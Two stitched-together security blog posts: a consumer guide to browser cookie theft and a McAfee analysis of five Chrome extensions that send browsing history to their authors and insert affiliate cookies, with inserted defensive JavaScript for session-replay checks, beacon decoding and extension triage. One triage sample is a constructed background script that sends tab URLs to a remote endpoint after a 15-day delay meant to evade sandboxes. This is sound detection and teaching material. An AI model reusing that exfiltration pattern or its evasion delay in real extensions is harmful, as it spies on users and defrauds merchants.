Chocolate chip, oatmeal raisin, snickerdoodle: Cybercriminals have a sweet tooth just like you. But their favorite type of cookie is of the browser variety.

Browser cookies – often just referred to as cookies – track your comings and goings on websites. And when a cyber thief gets their mitts on your browser cookies, it can open all kinds of doors into your online accounts.

The first step to protecting your devices and online privacy from criminals is to understand their schemes. Here are the key terms you need to know about cookie theft plus how to keep malicious software off your devices.

Key Cookie Theft Terms You Should Know

Cookie theft can happen to anyone. Knowing the basics of this cyberscheme may help you better protect your online life:

  • Browser cookie. A small collection of data your internet browser stores every time you visit a website. When your browser stores this data, it makes it quicker for you to log back into a website or for a website to customize its suggestions for you the next time you visit.
  • Cache. Like a mouse scurrying away a pile of sweet treats, your device hoards – or caches – all the cookies you gather from websites you visit. Your cache of cookies will grow continually until you clear it out. If your cache grows too large, it could slow down your device, affect performance, or tax your battery power.
  • Multifactor authentication. MFA is a way to log in to an online account that requires additional forms of identification beyond a username and password. It could require biometric identification (like a face or fingerprint scan), a security question, or a one-time code.

How and Why Do Criminals Steal Browser Cookies?

Cookie thieves are generally motivated by the financial gains of breaking into people’s online accounts. Banking, social media, and online shopping accounts are full of valuable personal and financial details that a cybercriminal can either sell on the dark web or use to impersonate you and steal your identity.

Malware is generally the vehicle cybercriminals use to steal cookies. Once the malicious software is on a device, it is designed to copy each new cookie’s data and send it to the cybercriminal. Then, from their own machine, the cybercriminal can load that data and start a new session using the target’s stolen cookies.
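To make the last step concrete from the website’s side, here is an added example (not part of this article) of a server-side check that notices when a session cookie is replayed from a machine other than the one that logged in. The in-memory store, the client attributes, the timestamps and the 12-hour session lifetime are all constructed assumptions for the example.

```javascript
// Added example: a server-side check that notices when a session cookie is
// replayed from a machine other than the one that logged in. The session store,
// client attributes, timestamps and session lifetime are constructed assumptions.

const MAX_SESSION_AGE_MS = 12 * 60 * 60 * 1000; // assumption: sessions live 12 hours

function createSessionStore() {
  return new Map(); // sessionId -> { userId, ip, userAgent, createdAt, lastSeen }
}

// Record a login together with the client attributes observed at that moment.
function startSession(store, sessionId, { userId, ip, userAgent, now }) {
  store.set(sessionId, { userId, ip, userAgent, createdAt: now, lastSeen: now });
}

// Decide what to do with a request that presents a session cookie.
// "allow": same client, within lifetime. "stepup": plausible client change,
// ask for MFA again. "deny": unknown, expired, or clearly a different client.
function validateSession(store, sessionId, { ip, userAgent, now }) {
  const session = store.get(sessionId);
  if (!session) return { decision: "deny", reason: "unknown_session" };
  if (now - session.createdAt > MAX_SESSION_AGE_MS) {
    store.delete(sessionId); // a copied cookie stops working once the session expires
    return { decision: "deny", reason: "expired" };
  }
  // A copied cookie is usually replayed from the thief's own browser, so the
  // user agent differs from the one recorded at login.
  if (session.userAgent !== userAgent) {
    return { decision: "deny", reason: "user_agent_mismatch" };
  }
  // IP changes happen legitimately (mobile networks, VPNs), so ask for a fresh
  // MFA code instead of refusing outright.
  if (session.ip !== ip) {
    return { decision: "stepup", reason: "ip_changed" };
  }
  session.lastSeen = now;
  return { decision: "allow", reason: "" };
}

// Walk a constructed sequence of requests and return the decisions taken.
function runSample() {
  const store = createSessionStore();
  const t0 = Date.UTC(2022, 7, 29, 10, 0, 0); // constructed login time
  const owner = { ip: "203.0.113.10", userAgent: "Mozilla/5.0 (Windows NT 10.0) Chrome/104" };
  startSession(store, "sess-abc", { userId: "user-1", ...owner, now: t0 });
  const requests = [
    { id: "sess-abc", ...owner, now: t0 + 60000 },                                        // owner, a minute later
    { id: "sess-abc", ip: "198.51.100.7", userAgent: owner.userAgent, now: t0 + 120000 }, // owner on a new network
    { id: "sess-abc", ip: "198.51.100.7", userAgent: "curl/8.0", now: t0 + 180000 },      // cookie replayed elsewhere
    { id: "sess-abc", ...owner, now: t0 + MAX_SESSION_AGE_MS + 1 },                       // after expiry
    { id: "sess-zzz", ...owner, now: t0 },                                                // cookie the server never issued
  ];
  return requests.map((r) => validateSession(store, r.id, r));
}

console.log(runSample());
```

The user-agent check is deliberately strict and the IP check deliberately soft: a thief replaying the cookie from a different browser is refused, while the real owner changing networks is only asked for a fresh MFA code, which is the same second factor the article recommends turning on.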

There was a stretch of a few years where cookie thieves targeted high-profile YouTube influencers with malware spread through fake collaboration deals and crypto scams. The criminals’ goal was to steal cookies to sneak into the backend of the YouTube accounts to change passwords, recovery emails and phone numbers, and bypass two-factor authentication to lock the influencers out of their accounts.[1]

But you don’t have to have a valuable social media account to draw the eye of a cybercriminal. “Operation Cookie Monster” dismantled an online forum that sold stolen login information for millions of online accounts gained through cookie theft.[2]

Best Practices for Secure Browsing

To keep your internet cookies out of the hands of criminals, it’s essential to practice safe browsing habits. These four tips will go a long way toward keeping your accounts out of the reach of cookie thieves and your devices free from malicious software.

  1. Set up MFA. MFA may seem like it’ll slow down your login process, but really, the extra seconds it takes are well worth it. Most people have their phone within arm’s reach throughout the day, so a texted, emailed, or authentication app-generated code is easy enough to access. Just remember that a reputable company will never ask you for one-time codes, so these codes are for your eyes only. MFA makes it extremely difficult for a criminal to log into your accounts, even when they have your password and username. Without the unique code, a bad actor is locked out.
  2. Watch out for phishing attempts and risky websites. Cookie-stealing malware often hops onto innocent devices through either phishing lures or visits to untrustworthy sites. Make sure to carefully read every text, email, and social media direct message. With the help of AI content generation tools like ChatGPT, phishers’ messages are more believable than they were years ago. Be especially careful with links that may take you to risky sites or download malicious files onto your device.
  3. Clear your cache regularly. Make it a habit to clear your cache and browsing history often. This is a great practice to optimize the performance of your device. Plus, if a cybercriminal does install cookie-stealing malware on your device and you store hardly any cookies, the thief will have little valuable information to pilfer.
  4. Use a password manager. While a password manager won’t protect your device from cookie-stealing malware, it will lessen your dependence upon storing valuable cookies. It’s convenient to already have your usernames and passwords auto-populate; however, if your device falls into the wrong hands these shortcuts could spell trouble for your privacy. A password manager is a vault for all your login information for your dozens of online accounts. All you need to do is input one master password, and from there, the password manager will autofill your logins. It’s just as quick and convenient, but infinitely more secure.

Lock Up Your Cookie Jar

McAfee+ is an excellent partner to help you secure your devices and digital life. McAfee+ includes a safe browsing tool to alert you to suspicious websites, a password manager, identity monitoring, and more.

The next time you enjoy a cookie, spare a moment to think of cookies of the digital flavor: clear your cache if you haven’t in a while, double-check your devices and online accounts for suspicious activity, and savor the sweetness of your digital privacy!

[1] The Hacker News, “Hackers Stealing Browser Cookies to Hijack High-Profile YouTube Accounts”

[2] CNN, “‘Operation Cookie Monster:’ FBI seizes popular cybercrime forum used for large-scale identity theft”


Written by Oliver Devane and Vallabh Chole

Update September 9, 2022: Since the original publication of this blog on August 29, 2022, the Flipshope browser extension was updated in the Chrome Store on September 6, 2022 with a version that no longer contains the potentially harmful features originally discussed in this blog.

Update September 30, 2022: Since the original publication of this blog on August 29, 2022, the AutoBuy browser extension was updated in the Chrome Store on September 17, 2022 with a version that no longer contains the potentially harmful features originally discussed in this blog.

A few months ago, we blogged about malicious extensions that redirect users to phishing sites and insert affiliate IDs into the cookies of eCommerce sites. Since then, we have investigated several other malicious extensions and found 5 with a combined install count of more than 1,400,000.

The extensions offer various functions such as letting users watch Netflix shows together, website coupons, and taking screenshots of a website. The latter borrows several phrases from another popular extension called GoFullPage.

In addition to offering the intended functionality, the extensions also track the user’s browsing activity. Every website visited is sent to servers owned by the extension creator. They do this so they can insert code into the eCommerce websites being visited. This action modifies the cookies on the site so that the extension creators receive an affiliate payment for every item purchased.

Users of the extensions are unaware of this functionality and of the privacy risk of every site visited being sent to the extension authors’ servers.

The 5 extensions are:

Name | Extension ID | Users
Netflix Party | mmnbenehknklpbendgmgngeaignppnbe | 800,000
Netflix Party 2 | flijfnhifgdcbhglkneplegafminjnhn | 300,000
FlipShope – Price Tracker Extension | adikhbfjdbjkhelbdnffogkobkekkkej | 80,000
Full Page Screenshot Capture – Screenshotting | pojgkmkfincpdkdgjepkmdekcahmckjp | 200,000
AutoBuy Flash Sales | gbnahglfafmhaehbdmjedfhdmimjcbed | 20,000

Technical Analysis

This section contains the technical analysis of the malicious Chrome extension ‘mmnbenehknklpbendgmgngeaignppnbe’. All 5 extensions exhibit similar behavior.

Manifest.json

The manifest.json sets the background page to bg.html. This HTML file loads b0.js, which is responsible for sending the visited URLs and injecting code into the eCommerce sites.

b0.js

The b0.js script contains many functions. This blog focuses on the functions responsible for sending the visited URLs to the server and processing the response.

Chrome extensions work by subscribing to events, which are then used as triggers to perform certain activities. The analyzed extensions subscribe to events from chrome.tabs.onUpdated. chrome.tabs.onUpdated fires when the user opens a new URL in a tab.

Once this event fires, the extension sets a variable called curl to the tab’s URL using the tab.url variable. It creates several other variables that are then sent as POST data in the following format:

Variable | Information
referrer | Base64-encoded referrer URL
Region | Region of the device
City | City of the device
Zip | Zip code of the device
Apisend | A randomly generated ID for the user
Name | Base64-encoded URL being visited
ext_name | Name of the Chrome extension
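For an analyst working from proxy or sandbox logs, the POST format above is enough to decode what an extension reported about the user. The following Node.js snippet is an added example, not code from the extensions or from this write-up: it parses form-encoded bodies with these seven fields, decodes the Base64 URL fields, and flags lines that match the pattern. The collector host (`collector.invalid`), the log lines and every field value are constructed for the example.

```javascript
// Added example: decode telemetry POST bodies of the shape described above and
// flag the ones that look like browsing-history exfiltration.
// The endpoint, log lines and field values below are constructed for this
// example; nothing was captured from the extensions.

const BEACON_FIELDS = ["referrer", "Region", "City", "Zip", "Apisend", "Name", "ext_name"];

// Decode a Base64 string, returning null when the input was not really Base64
// (Buffer decodes leniently, so we verify by re-encoding).
function decodeBase64(text) {
  if (!text) return null;
  const decoded = Buffer.from(text, "base64").toString("utf8");
  const reencoded = Buffer.from(decoded, "utf8").toString("base64");
  return reencoded.replace(/=+$/, "") === text.replace(/=+$/, "") ? decoded : null;
}

function isHttpUrl(value) {
  try {
    const u = new URL(value);
    return u.protocol === "https:" || u.protocol === "http:";
  } catch {
    return false;
  }
}

// Parse one application/x-www-form-urlencoded body into a readable record.
function parseBeacon(body) {
  const params = new URLSearchParams(body);
  return {
    fieldsPresent: BEACON_FIELDS.filter((f) => params.has(f)),
    visitedUrl: decodeBase64(params.get("Name")),
    referrerUrl: decodeBase64(params.get("referrer")),
    region: params.get("Region"),
    city: params.get("City"),
    zip: params.get("Zip"),
    clientId: params.get("Apisend"),
    extensionName: params.get("ext_name"),
  };
}

// Heuristic match: every field of the scheme is present, "Name" decodes to a
// web URL, and the client ID has the 8-character shape described in the write-up.
function looksLikeBrowsingExfil(body) {
  const beacon = parseBeacon(body);
  return (
    beacon.fieldsPresent.length === BEACON_FIELDS.length &&
    isHttpUrl(beacon.visitedUrl) &&
    typeof beacon.clientId === "string" &&
    beacon.clientId.length === 8
  );
}

// Constructed proxy log: "<timestamp> POST <url> <form body>" per line.
const SAMPLE_LOG = [
  "2022-08-29T10:00:01Z POST https://collector.invalid/api referrer=aHR0cHM6Ly93d3cuZ29vZ2xlLmNvbS8%3D&Region=CA&City=Los+Angeles&Zip=90001&Apisend=q7Zk2pLm&Name=aHR0cHM6Ly93d3cuYmVzdGJ1eS5jb20v&ext_name=Netflix+Party",
  "2022-08-29T10:00:02Z POST https://shop.invalid/cart item=123&qty=1",
  "2022-08-29T10:00:03Z POST https://collector.invalid/api Name=aHR0cHM6Ly93d3cuYmVzdGJ1eS5jb20v&ext_name=Netflix+Party",
];

// Return one readable record per log line that matches the exfiltration pattern.
function scanLog(lines) {
  const hits = [];
  for (const line of lines) {
    const [, method, url, body] = line.split(" ");
    if (method !== "POST" || !body || !looksLikeBrowsingExfil(body)) continue;
    const beacon = parseBeacon(body);
    hits.push({
      endpoint: url,
      extensionName: beacon.extensionName,
      visitedUrl: beacon.visitedUrl,
      referrerUrl: beacon.referrerUrl,
    });
  }
  return hits;
}

console.log(JSON.stringify(scanLog(SAMPLE_LOG), null, 2));
```

Only the first sample line is reported: the second is an ordinary shop request, and the third carries the visited URL but not the full field set, so it is left for manual review rather than auto-flagged.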

The random ID is generated by picking 8 random characters from a character set. The code is shown below:

The region, city, and zip are collected using the code shown below:

Upon receiving the URL, the server checks whether it matches a list of websites for which it has affiliate IDs, and if so, it responds to the request. An example is shown below:

The returned data is in JSON format. The response is checked using the function below, which calls the next function depending on the response.

These two functions are detailed below:

Result[‘c’] – passf_url

If the result is ‘c’, as in the example in this blog, the extension queries the returned URL. It then checks the response, and if the status is 200 or 404 it checks whether the request was answered with a URL. If so, it inserts the URL received from the server as an iframe on the web page currently being visited.

Result[‘e’] – setCookies

If the result is ‘e’, the extension inserts the result as a cookie. We could not find an ‘e’ response during our analysis, but this allows the authors to add any cookie to any website, since the extension has the required ‘cookies’ permission.

Behavioral flow

The image below shows the step-by-step flow of events when navigating to the BestBuy website.

  1. The user navigates to the BestBuy site, and the extension posts this URL in Base64 format to the extension author’s server.
  2. The server responds with “c” and a URL. “c” means the extension will call the passf_url() function.
  3. passf_url() makes a request against that URL.
  4. The URL requested in step 3 is redirected with a 301 response to a URL carrying the affiliate ID associated with the extension owner.
  5. The extension inserts that URL as an iframe on the site the user is visiting.
  6. The site sets cookies for the affiliate ID associated with the extension owner. They will now receive a commission for any purchase made on the site.

Here is a video of the events:

Time delay to avoid automated analysis

We found an interesting trick in several of the extensions that would prevent the malicious activity from being identified in automated analysis environments. They include a time check before performing the malicious activity. This is done by checking whether the current date is more than 15 days after installation.


This blog highlights the risk of installing extensions, even those with a large install base, as they can still contain malicious code.

McAfee advises its customers to be cautious when installing Chrome extensions and to pay attention to the permissions they request.

Chrome shows the permissions before the extension is installed. Customers should take extra steps to verify authenticity if an extension requests permissions that allow it to run on every website you visit, as detailed in this blog.

McAfee customers are protected from the malicious sites detailed in this blog, as they are blocked by McAfee WebAdvisor, as shown below.

The malicious code in the extensions is detected as JTI/Suspect. Please run a ‘Full’ scan with the product.
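The permission review recommended above can be partly automated. The following Node.js snippet is an added example (not code from McAfee or from the extensions) that triages an unpacked extension for the indicators this write-up describes: broad host access, the tabs and cookies permissions, background code that listens on chrome.tabs.onUpdated and sends tab URLs to a remote server, and an installation-age gate like the 15-day check. The manifest and background script it inspects are constructed inputs, the finding names and risk levels are the example’s own, and the regular expressions are a cheap first pass, not a substitute for reading the code.

```javascript
// Added example: static triage of an unpacked Chrome extension for the
// indicators this write-up describes (broad host access, cookie access,
// background code that watches navigation and talks to a remote server,
// and an installation-age gate). The manifest and script below are
// constructed inputs for the example, not code from the extensions.

const RISKY_PERMISSIONS = new Set(["tabs", "cookies", "webRequest", "webNavigation"]);
const BROAD_HOST_PATTERN = /^(<all_urls>|\*:\/\/\*\/\*|https?:\/\/\*\/\*)$/;

// Inspect permissions and background entry points (MV2 page/scripts or MV3 service worker).
function auditManifest(manifest) {
  const findings = new Set();
  const declared = [...(manifest.permissions || []), ...(manifest.host_permissions || [])];
  for (const p of declared) {
    if (RISKY_PERMISSIONS.has(p)) findings.add(`permission:${p}`);
    if (BROAD_HOST_PATTERN.test(p)) findings.add("runs-on-every-site");
  }
  const bg = manifest.background || {};
  if (bg.page || bg.scripts || bg.service_worker) findings.add("background-code");
  return [...findings];
}

// Regex heuristics over background-script source; a cheap first pass before manual review.
function auditBackgroundSource(source) {
  const findings = [];
  const watchesNavigation = /chrome\.tabs\.onUpdated\.addListener/.test(source);
  const sendsTabUrl = /\b(fetch\s*\(|XMLHttpRequest|sendBeacon\s*\()/.test(source) && /\btab\.url\b/.test(source);
  if (watchesNavigation && sendsTabUrl) findings.push("navigation-exfil-pattern");
  if (/chrome\.cookies\.set\s*\(/.test(source)) findings.push("sets-cookies");
  if (/createElement\(\s*["']iframe["']\s*\)|<iframe/i.test(source)) findings.push("injects-iframe");
  // Installation-age gate: wall-clock reads, day arithmetic and a "> N" comparison together.
  const usesClock = /Date\.now\(\)|new Date\(\)|\.getTime\(\)/.test(source);
  const dayMaths = /86400000|864e5|1000\s*\*\s*60\s*\*\s*60\s*\*\s*24/.test(source);
  if (usesClock && dayMaths && />\s*\d+/.test(source)) findings.push("install-age-gate");
  return findings;
}

function riskLevel(findings) {
  const f = new Set(findings);
  const actsOnPages = f.has("navigation-exfil-pattern") || f.has("sets-cookies") || f.has("injects-iframe");
  if (f.has("runs-on-every-site") && actsOnPages) return "high";
  return f.size > 0 ? "medium" : "low";
}

function triage(manifest, backgroundSource) {
  const findings = [...auditManifest(manifest), ...auditBackgroundSource(backgroundSource)];
  return { findings, risk: riskLevel(findings) };
}

// Constructed sample mirroring the layout described above: MV2 manifest with a
// background page, and a background script with the navigation hook and time gate.
const SAMPLE_MANIFEST = {
  manifest_version: 2,
  name: "Example Party",
  permissions: ["tabs", "cookies", "storage", "<all_urls>"],
  background: { page: "bg.html" },
};
const SAMPLE_BACKGROUND = `
chrome.runtime.onInstalled.addListener(() => chrome.storage.local.set({ installed: Date.now() }));
chrome.tabs.onUpdated.addListener((tabId, info, tab) => {
  chrome.storage.local.get("installed", (s) => {
    if ((Date.now() - s.installed) / 86400000 > 15) {
      fetch(ENDPOINT, { method: "POST", body: "Name=" + btoa(tab.url) });
    }
  });
});`;

// Constructed benign control: narrow permissions, no background code.
const BENIGN_MANIFEST = { manifest_version: 3, name: "Notes", permissions: ["storage"] };
const BENIGN_BACKGROUND = `chrome.storage.local.get("notes", (s) => render(s.notes));`;

console.log(triage(SAMPLE_MANIFEST, SAMPLE_BACKGROUND));
console.log(triage(BENIGN_MANIFEST, BENIGN_BACKGROUND));
```

The install-age finding matters for dynamic analysis: an extension whose behavior is gated on a 15-day-old installation timestamp will look clean in a sandbox that runs it for minutes, so a static hit here is the cue to seed the stored install date with an old value before detonating it.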

Type | Indicator | Product | Detected as
Chrome Extension | Netflix Party – mmnbenehknklpbendgmgngeaignppnbe | Total Protection and LiveSafe | JTI/Suspect
Chrome Extension | FlipShope – Price Tracker Extension – adikhbfjdbjkhelbdnffogkobkekkkej | Total Protection and LiveSafe | JTI/Suspect
Chrome Extension | Full Page Screenshot Capture – pojgkmkfincpdkdgjepkmdekcahmckjp | Total Protection and LiveSafe | JTI/Suspect
Chrome Extension | Netflix Party 2 – flijfnhifgdcbhglkneplegafminjnhn | Total Protection and LiveSafe | JTI/Suspect
Chrome Extension | AutoBuy Flash Sales – gbnahglfafmhaehbdmjedfhdmimjcbed | Total Protection and LiveSafe | JTI/Suspect
URL | | McAfee WebAdvisor | Blocked
URL | | McAfee WebAdvisor | Blocked
URL | | McAfee WebAdvisor | Blocked
URL | | McAfee WebAdvisor | Blocked
URL | Unscart.in | McAfee WebAdvisor | Blocked
URL | autobuyapp.com | McAfee WebAdvisor | Blocked
